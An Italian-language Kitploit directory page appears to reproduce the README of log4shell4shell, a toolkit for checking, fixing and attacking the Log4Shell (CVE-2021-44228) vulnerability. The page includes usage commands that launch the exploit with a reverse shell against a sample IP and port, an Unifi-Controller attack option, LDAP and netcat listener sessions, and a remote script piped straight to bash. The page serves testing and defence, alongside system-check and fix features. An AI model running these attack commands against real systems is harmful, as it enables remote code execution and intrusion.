Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4shell4shell — Log4shell - Multi-Toolkit. Trova, Correggi e Testa possibili vulnerabilità CVE-2021-44228 - fornisce un ambiente completo di test/attacco LOG4SHELL su shell | Kitploit
Strumenti/GitHubGitHub/suuhm/log4shell4shell
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - Multi-Toolkit. Trova, Correggi e Testa possibili vulnerabilità CVE-2021-44228 - fornisce un ambiente completo di test/attacco LOG4SHELL su shell

Vedi Repository
544 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4shell4shell

Log4j - Multitool. Trova & ripara possibili vulnerabilità CVE-2021-44228 - fornisce un ambiente completo di test/attacco LOG4SHELL

Anteprima

Funzionalità

  • Controlla il tuo sistema Linux/Mac/BSD e Windows per vulnerabilità CVE-2021-44228
  • Ripara il tuo sistema eliminando la classe java log4j / oppure impostando alcune variabili d'ambiente
  • Proof of Concept: puoi eseguire un server spring boot fittizio per testare l'exploit da solo (https://github.com/christophetd/log4shell-vulnerable-app)
  • Puoi eseguire un attacco verso un IP-Porta desiderato e includere un comando Base64 / Oppure una semplice Reverse Shell
  • Scansione completa di intervalli IP tramite https://github.com/fullhunt/log4j-scan

Come eseguire su Linux/Mac/BSD:

Requisiti:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip
  • Controlla rapidamente il tuo sistema con questo comando one-liner:

    root@kitploit:~
    wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
    

    Altre opzioni

    Esegui un attacco di esempio contro IP: 10.4.4.20 Porta 8080 loginpage e in aggiunta una Reverse Proxy Shell:

    root@kitploit:~
    git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
    mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
    ./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
    

    Esegui screen -r l4s4s-ldap-srv e/o screen -r l4s4s-nc-rsh per visualizzare alcune informazioni sull'attacco nella shell del server Exploit:

    Esegui una scansione completa IP: 10.4.4.20 Porta 8080 e inoltre prova tutti i test:

    root@kitploit:~
    ./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
    

    Esegui una Proof of Concept su un server Tomcat Springboot:

    root@kitploit:~
    ./l4s4s.sh --run-dummy-server && \
    ./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
    

    Esegui un attacco/controllo exploit Unifi-Controller (su 10.4.4.20:8443):

    root@kitploit:~
    ./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
    

    Tutte le opzioni disponibili

    root@kitploit:~
    _|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
    _|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
    _|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
    _|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
    _|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                              _|
                          _|_|
    
    
     > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm
    
    Wrong input! Please enter one of these options:
    
    Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
    
                            --get-powershell-finder
                            --check-system
                            --fix-log4j
                            --run-dummy-server <JNDIExploit.*.zip>
                            --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                            --python-scan <command>
    
    

    Come aggiornare la versione di Python su Linux e/o macOS:

    Esegui semplicemente il mio helper-script (--list-versions): ./python-upgrader.sh

    Come eseguire su Windows x86 / x64:

    Esegui semplicemente in Powershell (modalità amministratore): .\set_windows_fix.ps1

    Questo script è alpha! Quindi per favore fammi sapere se hai qualche problema

    Dichiarazione di non responsabilità

    Il progetto log4shell4shell è realizzato solo per scopi educativi e di test etici. L'uso di log4j-scan per attaccare bersagli senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili di qualsiasi uso improprio o danno causato da questo programma.

    Scarica lo strumento